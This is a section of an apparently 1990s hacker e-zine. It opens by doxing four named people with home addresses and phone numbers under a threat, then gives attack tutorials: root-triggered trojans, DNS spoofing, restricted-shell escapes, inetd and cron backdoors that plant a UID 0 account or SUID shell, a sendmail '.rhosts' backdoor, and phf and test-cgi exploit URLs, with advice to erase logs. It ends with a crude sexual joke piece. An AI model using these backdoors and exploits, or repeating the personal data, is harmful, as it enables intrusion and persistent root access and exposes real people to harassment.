ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. More sIn inf0z : The CodeZero + Friends
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

sIn are 0fficially property of the CodeZero.

-------------------------------------------------------------------------------

Alias : Evil Chick
Real Name : Suzette Kimminau
Address : 130 105th Ave. S.E. Apt. 218
Bellevue, Wa 98004
USA

Telephone : (206)454-7176
Email : evilchic@NWLINK.COM

-------------------------------------------------------------------------------

Alias : \\StOrM\\
Real Name : Jason Sloderbeck
Address : 5739 N Norton,
Kansas City, MO 64119
USA

Telephone : (816)453-8722
Email : storm@SINNERZ.COM

-------------------------------------------------------------------------------

Alias : JDKane
Real Name : Kim
Address : 327 E Park Road,
Round Lake, IL 60073
USA

Telephone : (847)546-9154
Email :

-------------------------------------------------------------------------------

Alias : JeNnYGrRl
Real Name : Jennifer Chambers
Address :
Kansas City, MO 61421
USA

Telephone :
Email :

-------------------------------------------------------------------------------

We got more, but not complete,

They can run, but they can never hide,

http://www.codez.com/inf0z.html

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Rooting From Bin : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

This is something I was thinking alot about the other day, I was on a System V
Release 4, I had just performed the chkperm exploit, which only gives
bin access (uid=1 and gid=1) to the system, so even though I own all the
files in the /bin/ directory, I am still not root. Here is a very very simple
technique I developed for such occasions, this may come in useful one day for
someone, somewhere...

Write a program that you can get people to run, you could get hold of the
source for a common program, such as su or who or mount. Put this line in
it somewhere:

if ( !strcmp(getlogin(),"root") ) system("whatever you want");

This checks to see if the root login is running your program. If he is, you
can have him execute any shell command you'd like. Here are some suggestions:

"chmod 666 /etc/passwd"

/etc/passwd is the system's password file. The root owns this file.
Normally, everyone can read it (the passwords are encrypted) but only the root
can write to it. Take a look at it and see how it's formatted if you don't
know already. This command makes it possible for you to now write to the file

- i.e. create unlimited accounts for yourself and your friends.

"chmod 666 /etc/group"

By adding yourelf to some high-access groups, you can open many doors.

"chmod 666 /usr/lib/uucp/L.sys"

Look for this file on your system if it is on the uucp net. It contains
dialups and passwords to other systems on the net, and normally only the uucp
administrator can read it. Find out who owns this file and get him to
unknowingly execute a program to unlock it for you.

"rm /etc/passwd"

If you can get the root to execute this command, the system's passwd file
will be removed and the system will go down and will not come up for some time
to come. This is very destructive and evil, but pointless, if you do want to
damage a system, at least use your imagination.

If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow. If the hidden purpose is something
major (such as unlocking the user's mbox or deleting all of his files or
something) this program shouldn't be a program that people will be running a
lot (such as a popular computer game) - once people discover that their files
are public access the source of the problem will be discovered quite easily.
Save this purpose for a 'test' program (such as a game you're in the process
of writing) that you ask individual people to run via mail or 'chatting' with
them. As I said, this 'test' program can bomb or print a phony error message
after completing its task, and you will just tell the person "well, I guess
it needs more work", wait until they log off, and then read whatever file of
theirs that you've unlocked. If your trojan horse program's sole purpose is
to catch a specific user running it - such as the root or other high-powered
user - you can put the code to do so in a program that will be run a lot by
various users of the system. Your modification will remain dormant until he
runs it. If you cant find the source to 'star trek' or whatever in C, just
learn C and convert something from pascal. It can't hurt to learn C as it's a
great language. We've just seen what it can do on a UNIX system. Once you've
caught the root (i.e. you can now modify the /etc/passwd file) remove the
spurious code from your trojan horse program and you'll never be caught.

so1o.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. DNS Spoofing : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

You can now use a new DNS spoofing technique originally developed by johan,
I have seen this technique often applied to IRC, and prym was one of the first
to use the technique for that purpose.

Here is a basic introduction into the DNS concept.
--------------------------------------------------

DNS stands for Domain Name Server although you may hear it refered to as
Dynamic Name Server. DNS servers are used so that instead of everyone having
numeric IP's for their websites and shit, they can use a DNS so that a client
can 'lookup' the name (eatme.com for example) to the numeric IP.

Basically, a DNS server is a computer which is running a nameserver daemon
typically listening on UDP port 53. When a new domain is setup the domain is
registered with Internic. Internic then tells its clients who has authority
over the domains registered with it.

For example say 1.2.3.4 wanted to resolve the address for peachie.com and
1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric
IP for peachie.com was, so 1.3.3.7 would ask internic who had authority over
peachie.com and internic might reply with ns.peachie.com. So then 1.3.3.7
would ask ns.peachie.com what the numeric IP for peachie.com was.
Then ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com
was 4.3.2.1 and then 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the
name would be resolved.

DNS servers generally cache addresses that are looked up by its clients.
So if 1.2.3.4 were to ask 1.3.3.7 what the address for taco.com was again,
1.3.3.7 would not ask Internic etc. instead it would take the IP that it had
previously resolved earlier and say that the numeric IP for peachie.com is
4.3.2.1. the funny part is that the DNS server doesn't do alot of checking
when another nameserver replies to its query. It basically just tells the
client what is was told at an earlier point and caches it in the same way.
This is why we can spoof using such a technique, but we would need root
access to a nameserver first, this is one of the biggest setbacks...

How to spoof your DNS.
----------------------

Lets say were sitting on ns.peachie.com with root, and we have authority
for all of peachie.com. we want to cache our boxs address 2.2.2.2 on the
remote nameserver ns.eatme.org so that we can connect to eatme.org with the
address of trusted.eatme.org. We could write a program that listens for DNS
queries and replies with false information. sitting on ns.peachie.com we
could lookup peachie.com on the nameserver ns.eatme.org. ns.eatme.org would
ask Internic who had authority for peachie.com and it would reply to
ns.eatme.org that ns.peachie.com had authority over peachie.com. Then
ns.eatme.org would ask ns.peachie.com what the address for peachie.com was.

If we were running a normal DNS then it would tell ns.eatme.org that the
address for peachie.com was 4.3.2.1. but we aren't. We'll say that
ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is
trusted.peachie.com and the address for trusted.peachie.com is 2.2.2.2.
This exploits the failure to check a few things on the DNS.

Basically ns.eatme.org asked what the numeric IP for peachie.com was and we
told it that the reverse of 2.2.2.2 is trusted.eatme.org and that the IP
of trusted.eatme.org is 2.2.2.2. They asked a question to which we responded
with two awnsers to different question entirely. Now we would simply connect
to eatme.org from 2.2.2.2 and eatme.org would ask ns.eatme.org for the reverse
of 2.2.2.2 and in its cache it would find trusted.eatme.org and it would reply
with that answer. Then it would ask for the address of trusted.eatme.org and
it would reply with 2.2.2.2. you would then be connected to eatme.org
from trusted.eatme.org and in effect DNS spoofing.

That's all there is to it, it may be a bit heavy for some people.

so1o.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. FreeNet : TrN
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Breaking security on restricted shells and freenets.

What many system administrators fail to realize is that by setting up shells
and security on their applications and systems, and generally trying to lock
users in a freenet menu environment, it is almost impossible to fully examine
every program. Many programs allow you to escape to shells, even in secure mode,
especially the older ones. There is a longstanding bug in the gohper
application, used by many freenets, that allows you to start up a gopher server,
where an entry is created such as ";sh". Following this entry provides a shell.
This is the main reason why the original gopher client is no longer in use.
A "l;rm -rf *" was just as easy.

In todays world, the biggest problem is that freenets usually allow you to edit
files. If this is the case, you almost have a 100% chance of you getting into
a real shell. What you first have to do is see if you can go through the menu
system to edit a file. If you can't that is cool too. We are going to show you
how to get a shell out of PINE. It doesn't matter which version, this works all
the way up to 3.96. Anyway, like I was saying, you should see if you can either
a) edit a file, or b) upload a file. I'm almost sure you can do either.
So, lets start a little session here. First, you have to edit your .pinerc.
If you can't, download it (or get it from the PINE package), make the changes,
and reupload it. What is important is that you edit the feature-list=commands,
and have it read something similar to this:

feature-list=enable-alternate-editor-cmd,
enable-unix-pipe-cmd

After setting this correctly, go further in the file, and until you find the
editor= command. It is stated that the editor is normally set to sh, and
invoked via _^ [Control-Shift-Dash]. Do you get the idea yet?
Set the line to read editor=sh and then save the file. Now for the fun part.
Start up pine, and chose Compose Message. Erase all the To/Cc/Att/Sub headers,
and make the message text blank, except for the work "sh" (without the quotes)
on a single line. After this is done, press the alternate editor hotkey (^_).
Here is what happens:

To :
Cc :
Attchmnt:
Subject :
----- Message Text -----
sh
$

Kinda neat. That little $ is the sign that it all worked. What you probably
want to do is execute some of the standard commands that tell you a little
about where you are:

$ uname -a ; uptime ; /sbin/ifconfig -a
SunOS pb 4.1.3_U1 1 sun4m
12:14am up 47 days, 12:18, 24 users, load average: 2.71
le0: flags=63<UP,BROADCAST,NOTRAILERS,RUNNING>
inet 199.227.192.35 ffffff00 199.227.192.0
lo0: flags=49<UP,LOOPBACK,RUNNING>
inet 127.0.0.1 ff000000

Then a w ; ps -aux would be nice. It can tell you a little about what is going
on, and what is safe to do the things you want. You should probably log on
late at night, compile slirp if it is only a shell/vt dialin, and then check
the system for vunerabilities, unshadowed passwords, etc. I've notified my
freenet of their problems, but they don't seem to care. Maybe now they will.
Ok sysadmins, fix up your freenets, and hackers... Hack the planet. :-)

This article by TrN of The CodeZero. I'll have more interesting information
on the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by
e-mail at p033644b@pbfreenet.seflin.lib.fl.us. You should check out the web
page, as it has other security related information. LaterZ.

One other thing to consider, if ports 514 / 512 are open, then you can try
creating an .rhosts file in your home directory containing "+ +", then use..

rsh -l loginhere systemhere.com csh -i

...and you will get a shell -- so1o.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Backdoors Revised : Blk-Majik
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Disclamer:

If you do anything mentioned in this article, it is your own fault and any
trouble you manage to get into is your own responsibility, not mine.
But what am I thinking...like any of you lamers can root a shell :).

gr33tz:

A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown, pack,
plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for
making this document possible and helping me out!

=============================================================================
section 1:
=============================================================================

What is a back door? :

Well, kiddies, a backdoor is just a way to remotely get into a shell without
being noticed or sometimes logged. This can be done by adding a extra telnet
port to the server I will show you a few ways to set up the port, and also
how to keep it up even after the admin find it.
so1o had a section in a back issue with a back door using the inetd.conf
file where you had to end all commands with a ";". Well that annoyed the
hell out of me so I have modified his technique.

=============================================================================
section 2:
=============================================================================

What you need :

Basically, you need root on a shell to start (and a Unix based OS).
After that, you will need a good editor....say pico or vi. Most of you
#shells wh0res need, but lack this important ingredient....a fucking brain.

=============================================================================
section 3:
=============================================================================

Understanding the technique :

After you checked your head, editor, whoami, etc, you are all set. Ok, this
is what you look for:

/etc/services This file lets you find a port
/ect/inetd.conf This is where the backdoor will be

ok, in the /etc/services file, you will see something like this:

tcpmux 1/tcp #TCP Port Service Multiplexer
tcpmux 1/udp #TCP Port Service Multiplexer
compressnet 2/tcp #Management Utility
compressnet 2/udp #Management Utility
compressnet 3/tcp #Compression Process
compressnet 3/udp #Compression Process

ok, what the fuck is that? ill explain it with this example:

ftp 21/tcp #File Transfer [Control]
ftp 21/udp #File Transfer [Control]

[1] [2]/[3] #[ 4 ]

1: The name of the service of the system.
2: The port that the system uses for the service.
3: The protocol (going to be tcp. You can chose either tcp or udp.)
4: A description of what the service is used for.

Aight, thats the service file...you will need this later.

now look at the /etc/inetd.conf file. the inetd is a Internet daemon that
will listen for tcp requests and UDP prots and then spaws the program when a
connection request is made.

It will look like this:

ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A
telnet stream tcp nowait root /usr/libexec/tcpd telnetd
shell stream tcp nowait root /usr/libexec/tcpd rshd
login stream tcp nowait root /usr/libexec/tcpd rlogind -a
exec stream tcp nowait root /usr/libexec/tcpd rexecd

let me explain it:

ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A
[1] [ 2 ] [3] [ 4 ] [ 5 ] [ 6 ] [ 7 ]

1: Name of deamon in the services file. It tells inetd what to look for in
/etc/services to see what port to use when connecting.
2: Type of of socket connection that the deamon will accept.
3: Protocol field which is always TCP or UDP.
4: How long to delay connection.
5: User to run on the deamon as (used with uid/gid permissions etc.)
6: What program will keep the connection.
7: The actual command or daemon.

Ok, so what that dose it makes a port for telnet (port 21, as defined in the
services file). It has a stream/tcp connection and dosn't wait for a prompt.
The user is of root access and uses /ur/libexec/tcpd (but limited commands)

Ok, now u know what the shit is for, next step...

=============================================================================
section 4:
=============================================================================

Installing the backdoor :

Backdoor I : Using /etc/inetd.conf and /etc/services
----------------------------------------------------

method 1 :
----------

ok, now go back to the /etc/services file. Look at it and find a service you
think the admin will not notice, and that is not in use. remember the name
of the service. Now, go to the inetd.conf file. Go to a place with all the
services name where the 1 is in the above example. Add you service somewhere
so it is hidden within others. For 2, put the port of the service. 3 is tcp,
duh. 4 is nowait. 5 will be root, so u get root access. 6 is going to be
/bin/sh or what ever you like. 7 has to be 6 -i..ex: if 7 is /bin/sh,
7 is /bin/sh -i

here is an example:

ftp stream tcp nowait root /bin/sh sh -i

Ok, now you have to restart the inetd. do this by typing (as root) :

killall -HUP inetd

Ok, now lets test it. From a different system...

telnet victum.server.com 21
Trying 123.456.78.9...
Connected to comp.com
Escape character is '^]'.
bash#
bash# whoami
root
bash#

tip:

do NOT use the ftp port...it is just used to often. Pick a service that is
not use alot. It will help you keep the backdoor running.

method 2:
---------

If you are willing, you can add your own service to the service file.
This is easy..say you service file is like this:

netbios-ssn 139/tcp nbssn
imap 143/tcp # imap network mail protocol
NeWS 144/tcp news # Window System
snmp 161/udp

ok, look at the ports.....see how they skip a few? well lets fill 1 of them
up...

netbios-ssn 139/tcp nbssn
suled 142/tcp suled
imap 143/tcp # imap network mail protocol
NeWS 144/tcp news # Window System
snmp 161/udp

Notice the suled service...that I added that to the /etc/services.

Ok, now to the /etc/inetd.conf file:

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn

...Here we go!!

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn
suled stream tcp nowait root /bin/sh sh -i

Ok, now restart inetd like i said how to before...

You're all set, telnet localhost <port u set> and test it!@~#

Backdoor II: Da beauty of CRON
-------------------------------

Ok, cron trojans are good for keeping root if the admin kills the backdoor.
A Cron is a timed daemon. It consits of hours, minutes, etc. It will make the
system automatically issue a command on the shell at a given time of your
choice... Type crontab in the shell. It will tell you how to list, run and
remove crons. You will like to look at the /var/spool/cron/crontabs/root.
This is what the crons will look like:

0 0 * * 1 /usr/bin/updatedb
[1] [2] [3] [4] [5] [ 6 ]

1: munute, 0-59
2: hour, 0-23
3: day of month, 1-31
4: month of yeat, 1-12
5: day of week, 0-6
6: command to execute

The example above is issued on monday's. If you want to exploit the cron,
simply add an cron line to the /var/spool/crontab/root.

ie: If you use the UID 0 account (as seen later), you can make a cron to
see if the UID 0 account is still alive. If root killed it, the cron can
re-add it!

...This will make the UID 0 account, just for back-up:

Cron #1
-------

newuser.sh
----------

#!/bin/sh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com

set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...


*** NOTE : MODIFY THE ECHO "YOURUSER..." PART!!

Here is a script that kinda does the same thing, but instead of making a new
account, it will look for an old, disabled account and enable it just for you :


dead.sh
-------

#!/bin/sh
# Everyone's favorite...

cp /bin/csh /tmp/.yourlittleshell # Don't name it that...
chmod 4755 /tmp/.yourlittleshell

Ok, here is where the cron comes in. It will look in the passwd files to
check if you YouUser is still alive. If not, it brings him back!

revive.sh
---------

#!/bin/sh
#Is YourUser still on the system? Let's make sure he is.
#daemon9@netcom.com

set evilflag = (`grep eviluser /etc/passwd`)


if($#evilflag == 0) then # Is he there?

set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string option
echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif


cron #2
-------

First of all, you will need a copy of the /etc/passwd file in a hidden
location. For this example, we will use /var/spool/mail/.hidepass. We have
one entry in it that will be are root account we will use. Then lets make a
cron that will save a copy of the real /etc/passwd file and install the hidden
passwd file as the real one for 1 minute at a time of your choice. Make it
at a slow time of day because any one who tries to access the passwd file
durring this minute will get an error. 4:30 am is a good time. Put this in
the roots cron to do this :

29 4 * * * /bin/usr/hidenhidenpass

..make sure this exist

#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden

here is the /bin/usr/hidenhidenpass

.hidden
-------

#!/bin/sh
# Install trojan /etc/passwd file for one minute
#daemon9@netcom.com
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd


Cron #3
--------

This is a c script that will work like the above. Cron it as root like as
above and just let this file load every day.

hidden.c
--------

#include<stdio.h>

#define KEYWORD "industry3"
#define BUFFERSIZE 10

int main(argc, argv)
int argc;
char *argv[];{

int i=0;

if(argv[1]){ /* we've got an argument, is it the keyword? */

if(!(strcmp(KEYWORD,argv[1]))){

/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}

}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */


=============================================================================
section 5:
=============================================================================

Sendmail backdoor :
-------------------

With this, you have to edit the /etc/aliases file. add this line:

decode: |/usr/bin/uudecode

make sure u hide it in their so it aint odvious :). the uudecode file will
be a .rhosts file with the full pathname embedded.

here is the script:

uudecode.sh
-----------

#!/bin/sh
# Create our .rhosts file. Note this will output to stdout.

echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts


Ok, now telnet to victumserver.com at port 25. Fakemail to decode and use as
the subject body, the uuencoded version of the .rhosts file. Here is an easy
one (but not fake):

echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com

You can add any program that I have listed to be ran from the alias, so be as
creative as u want! :)

=============================================================================
section 6:
=============================================================================

Others :

Here is one of the best trojans I have seen. It is sneeky and only detectable
by programs like tripwire. All you have to do is put the trojan code into a
the source of some popular system programs. su, login, and passwd are very
good to add it to because they run a SUID root and don't have strict
permission so you can modify it. This will tell you what to do after u get
the source code for the particular UNIX system you are backdooring. If you
can't get the source for any programs on your system, u may be screwed :(.
You can find trojaned versions of many programs, here is a small example
of pseudo-code that is added in such programs...

get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...

=============================================================================
section 7:
=============================================================================

Keeping the backdoor :

Well, the best advice I can possibly give to start off is to cover your
tracks. If the admin doesn't know he's been hacked, he won't look for
backdoors to remove. This will totaly depend on the admins ability to find
backdoors and know how to get rid of them.

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. One Last Thing About The Infamous pHf Technique : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

You can use this basic form of attack...[Thru NutScrape For Example]

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
[ 1 ][ 2 ][ 3 ][ 4 ][5][ 6 ]

1: The Target Site.
2: The pHf Command.
3: The Magic pHf Arguments.
4: The Program You Wish To Run.
5: %20 Is A Space, so %20%20%20 == 3 Spaces.
6: The Arguments You Wish To Use.

Here Are Some Other Examples...
-------------------------------

http://www.site.com/cgi-bin/phf?Qalias=x&0a/bin/ls%20-la%20/etc/

...This will list the files in the /etc/ directory.

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a

...This will display the operating system.

Remember : You execute the commands with pHf as the user nobody, so you can't
shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the
stuff you throw at the system using phf will be logged too, so
if you do decide to hack the system, remember to kill the logs
when you get root :)

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. Test-cgi holes : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Example exploit:
----------------

Below are examples, nc is netcat from avian.org. You can
always just telnet to port 80 and type in the GET... command.

machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80

CGI/1.0 test script report:

argc is 1. argv is /\*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

...Or to see what other cgi-goodies are still floating around...

machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80

CGI/1.0 test script report:

argc is 1. argv is \*.

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8. Tree raping : digitalboy [DD]
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Tree raping can be an exciting and fulfilling hobby, as long as the
proper safety precautions are taken. This file will try to outline the
process of tree raping, as well as give you some background on the sport of
tree raping.

\|/ History \|/

Tree raping originated in Eastern Africa long before history was recorded.
It was practiced by tribes of natives who used it as a test to determine the
tribal chief. He who could rape the most trees was surely the most powerful,
and therefore the rightful leader.

The sexual molestation of trees was kept a tribal secret, and no outsiders
learned of the practice until the late 1800's when Spanish explorer Hernando
Ferdinando Enriquez happened to witness the event. He was killed by the
natives he had been watching, but before his death he wrote of it in his
journal. In 1937, a nun found the journal and the methods of tree raping were
spread to the rest of the civilized world.

\|/ Preparation \|/

Tree raping is not something you can just go out and do. You must be
prepared. First and foremost, find a forest. While some of the best trees are
found in urban settings, violating them will usually land you in the city
jail. Not to mention the public ridicule. No, this is an activity that must
take place in a relatively secluded part of a forest. Bring a few friends if
that is your fancy, but large tree raping orgies usually lessen the
enjoyment. You must also bring a large vat of maple syrup and possible
climbing equipment, this will be explained later.

\|/ Tree Selection \|/

Picking the right tree to violate is essential. If you pick the wrong
tree, you could end up feeling inadequate, as well as inflicting serious
physical injury upon yourself. Everyone has their own preference as to what
type of tree to choose, but there are some general guidelines. The most vital
factor you have to consider is the position of knotholes. If a knothole is
not present, you may be forced to create your own. Any seasoned tree rapist
always carries his trusty power drill. Also, be sure to measure the depth of
the knothole. The texture of the bark is also important. Extremely rough bark
can ruin your experience. Try to find a tree with smooth bark, such as a
birch. Note that you are not limited to the part of the tree at ground level.
Bring some climbing equipment and you can easily reach the desired level.

\|/ The Act Of Tree Raping \|/

Tree raping always has and always must be done in complete nudity. Now,
remember that you were required to bring along a vat of maple syrup. This
object will now come into play. First, heat it to exactly 54.7 degrees
Celsius. Next lift the syrup over your head and pour it over your body. Count
to 112, then lie down and roll around on the forest floor. You are now ready
to begin the ritual. Approach the tree you have picked while screaming "TSAK
NARP FNORZA QKWT" as loud as possible. Penetrate the tree and proceed to
violate it. Try to keep moving, the maple syrup can be a powerful bonding
agent. When you are finished you will have to find your own method of
removing the maple syrup.

\|/ The End \|/

Avoid Pine trees AT ALL COSTS!

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
